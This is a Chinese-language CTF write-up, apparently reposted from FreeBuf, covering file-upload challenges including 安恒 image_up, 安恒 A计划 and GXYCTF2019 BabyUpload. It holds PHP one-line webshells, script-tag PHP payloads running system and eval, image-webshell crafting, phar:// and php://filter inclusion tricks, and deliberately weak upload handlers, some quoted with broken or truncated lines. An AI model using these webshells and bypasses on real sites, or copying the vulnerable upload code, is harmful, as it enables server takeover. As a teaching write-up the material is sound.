最近刷了几道文件上传的题,其中包括 js 绕过、.htaccess 上传、phar 绕过,文件上传的题目一般都是黑盒,白盒审计很少,奇奇怪怪的东西还是挺多的。就我自己来说,做这种题一般都是各种都试试,基本上都能出来。
姿势一:Pr绕过上传限制
进行压缩,之后把 rar 的后缀名改成 jpeg 格式
首先我们在本地测试一下: 准备一句话木马
test.php
<?php @eval($_POST["cmd"]);?>
index.php可以看到,是可以执行的。
安恒月赛:image_up
首先我们把源码读出来:
这里是利用伪协议读取源码/index.php?page=php://filter/read=convert.base64-encode/resource=index.php
index.php
<?php
if(isset($_GET['page'])){
if(!stristr($_GET['page'],"..")){
$page = $_GET['page'].".php";
include($page);
}else{
header("Location: index.php?page=login"); }
}else{
header("Location: index.php?page=login");
}
login.php
<?php
if(isset($_POST['username'])&&isset($_POST['password'])){
header("Location: index.php?page=upload");
exit(); }
?>
upload.php
<?php
$error = "";
$exts = array("jpg","png","gif","jpeg");
if(!empty($_FILES["image"]))
{
$temp = explode(".", $_FILES["image"]["name"]);
$extension = end($temp); if((@$_upfileS["image"]["size"] < 102400)) {
if(in_array($extension,$exts)){
$path = "uploads/".md5($temp[0].time()).".".$extens
move_uploaded_file($_FILES["image"]["tmp_name"], $p $error = "上传成功!";
} else{
$error = "上传失败!"; }
}else{
$error = "文件过大,上传失败!";
} }
?>
这道题就是利用 phar 伪协议去包含我们写好的一句话
具体做法: 木马文件打包成压缩包,然后改后缀,再利用 phar 伪协议读取
phar://./uploads/4h214215521321.jpg/1
最后用蚁剑链接就可以拿到 flag
姿势二:js绕过
例题一查看源码之后发现文件上传,图片马
先来做一个吧
合成图片马的命令:copy 1.png /b + 1.txt /a 2.png我们先来上传一个一句话木马吧,这里发现是能够上传成功的,但是不解析,最后利用 JS 绕过 payload:
<script language=php>system(“ls”)</script>
利用 file 读取上传的文件,发现是解析 php 文件的
查看文件名发现有 flag 相关文件,直接读就出
例题二:安恒 A 计划
先附上源码吧
index.php
?php
error_reporting(0); highlight_file(__FILE__);
$file = $_GET['file'];
if (preg_match("/flag/", $file)){
die('Oh no!');
}
include $file;
?>
file_up1oad.php
<?php
error_reporting(0);
date_default_timezone_set('PRC');
if(isset($_FILES['file'])) {
$file_name = basename($_FILES["file"]["name"]);
$file_ext = pathinfo($file_name,PATHINFO_EXTENSION);
$file_type = $_FILES['file']['type'];
$file_content = $_FILES['file']['tmp_name']; if(in_array($file_ext, ['php', 'php3', 'php4', 'php5', 'phtml
', 'pht'])) {
die('Php file ?');
}
if (!in_array($file_type, ['image/jpeg', 'image/gif', 'image/ png'])){
die('Bad file');
}
if (preg_match("/<\?php|eval|assert|@/i", file_get_contents($ file_content))){
die('Bad file of content !');
}
if (!file_exists('uploads')){ mkdir('uploads');
}
$new_filename = md5(time()).'.'.$file_ext;
$u = move_uploaded_file($_FILES['file']['tmp_name'], './uploa
ds/' . $new_filename); if ($u){
echo 'Successful'."\n";
echo '/uploads/'.$new_filename; }
}
?>
<html>
<body>
<meta charset="UTF-8">
<h2>File upload</h2>
<form action="" method="post" enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="file" id="file"/><br /> <input type="submit" name="submit" value="submit" />
</form>
</body>
</html>
审计了一下,估计也就是 js 合成个图片马php 文件:
<script language="php"> system( 'ls'); </script>
合成木马直接上传,
/index.php/?file=/var/www/html/uploads/62bfd63a7b411adea7a484c88cbaed0d.png
利用一下文件包含
直接查看 flag 文件
例题三:[GXYCTF2019]BabyUpload
<script language="Php">eval ($_POST[1]);</script>
合成图片马:
直接上传蚁剑连接源码:
<?php
session_start();
echo "<meta http-equiv=\"Content-Type\" content=\"text/html; char set=utf-8\" />
<title>Upload</title>
<form action=\"\" method=\"post\" enctype=\"multipart/form-data\" >
上传文件<input type=\"file\" name=\"uploaded\" />
<input type=\"submit\" name=\"submit\" value=\"上传\" />
</form>";
error_reporting(0);
if(!isset($_SESSION['user'])){
$_SESSION['user'] = md5((string)time() . (string)rand(100, 10 00));
}
if(isset($_FILES['uploaded'])) {
$target_path = getcwd() . "/upload/" . md5($_SESSION['user']) ;
$t_path = $target_path . "/" . basename($_FILES['uploaded'][' name']);
$uploaded_name = $_FILES['uploaded']['name'];
$uploaded_ext = substr($uploaded_name, strrpos($uploaded_nam e,'.') + 1);
$uploaded_size = $_FILES['uploaded']['size'];
$uploaded_tmp = $_FILES['uploaded']['tmp_name'];
if(preg_match("/ph/i", strtolower($uploaded_ext))){
die("后缀名不能有 ph!");
} else{
if ((($_FILES["uploaded"]["type"] == "") || ($_FILES["uploaded"]["type"] == "image/jpeg") |
| ($_FILES["uploaded"]["type"] == "image/pjpeg")) && ($_FILES["up loaded"]["size"] < 2048)){
$content = file_get_contents($uploaded_tmp);
if(preg_match("/\<\?/i", $content)){
die("诶,别蒙我啊,这标志明显还是 php 啊");
}
else{
mkdir(iconv("UTF-8", "GBK", $target_path), 0777,
true);
move_uploaded_file($uploaded_tmp, $t_path);
echo "{$t_path} succesfully uploaded!";
}
} else{
die("上传类型也太露骨了吧!"); }
}
}
?>
姿势三:.htaccess上传
我们把 content-type 改成 image/jpeg 格式发现上传成功,下一步就是传图片马源码: index.php
<?php
session_start();
echo "
<meta charset=\"utf-8\">
<title>是兄弟就来传
<a><img src=\"https://s1.ax1x.com/2020/03/13/8KBOlq.jpg\" alt=\"8 KBOlq.jpg\" border=\"0\" /></a
<a><img src=\"https://s1.ax1x.com/2020/03/13/8KcVoT.md.jpg\" alt= \"8KcVoT.jpg\" border=\"0\" /></a>
<form action=\"upload.php\" method=\"post\" enctype=\"multipart/f orm-data\">
<input type=\"file\" name=\"uploaded\" />
<br/>
<input type=\"submit\" name=\"submit\" value=\"一键去世\" /> </form>";
if(!isset($_SESSION['user'])){
$_SESSION['user'] = md5((string)time() . (string)rand(100, 10 00));
}
?>
upload.php
<?php
session_start();
echo "
<meta charset=\"utf-8\">"; if(!isset($_SESSION['user'])){
$_SESSION['user'] = md5((string)time() . (string)rand(100, 10 00));
}
if(isset($_FILES['uploaded'])) {
$target_path = getcwd() . "/upload/" . md5($_SESSION['user']) ;
$t_path = $target_path . "/" . basename($_FILES['uploaded'][' name']);
$uploaded_name = $_FILES['uploaded']['name'];
$uploaded_ext = substr($uploaded_name, strrpos($uploaded_nam e,'.') + 1);
$uploaded_size = $_FILES['uploaded']['size'];
$uploaded_tmp = $_FILES['uploaded']['tmp_name'];
if(preg_match("/ph/i", strtolower($uploaded_ext))){
die("我扌 your problem?");
}
else{
if ((($_FILES["uploaded"]["type"] == "") || ($_FILES["uploaded"]["type"] == "image/jpeg") | | ($_FILES["uploaded"]["type"] == "image/pjpeg")|| ($_FILES["uplo aded"]["type"] == "image/png")) && ($_FILES["uploaded"]["size"] <
2048)){
mkdir(iconv("UTF-8", "GBK", $target_path), 0777, true)
move_uploaded_file($uploaded_tmp, $t_path);
echo "{$t_path} succesfully uploaded!";
}
else{
die("我扌 your problem?");
}
}
}
来源:freebuf.com 2021-01-28 10:12:14 by: 星云博创科技有限公司
请登录后发表评论
注册